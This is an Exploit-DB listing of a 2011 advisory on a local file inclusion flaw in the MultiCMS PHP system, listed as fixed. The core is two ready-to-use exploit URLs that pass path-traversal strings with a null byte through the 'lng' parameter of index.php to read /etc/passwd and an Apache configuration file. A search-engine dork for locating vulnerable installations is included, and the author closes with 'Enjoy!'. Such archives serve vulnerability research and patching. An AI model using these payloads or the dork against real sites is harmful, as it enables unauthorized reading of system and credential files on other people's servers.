MultiCMS - Local File Inclusion

EDB-ID:

16074

CVE:

N/A

EDB Verified:

Author:

R3VAN_BASTARD

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2011-01-29

Vulnerable App:

Source: http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt

ï»¿=============================www[dot]Whiteponny[dot]com=============================
# Date: 29/01/2011
# Author: R3VAN_BASTARD
# Exploit Title: MultiCMS File Inclusion Vulnerbility
# Vendor: http://www.multicms.net
# Status: FIXED
# Tested on: Windows 7
# Dork: "RedakcnÃ systÃ©m MultiCMS"
# Mail: defrontliner@whiteponny.com
================================================================================
# File: /Index.php?lng=[LFI]
# XPL: http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00
           http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00 

Enjoy! :D
================================================================================
Thanks To: Madonk "Makasih udah nemenin Scan :D"
                 S3T4N a.k.a Zeth.
                 All My Friends
=============================www[dot]Whiteponny[dot]com=============================

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services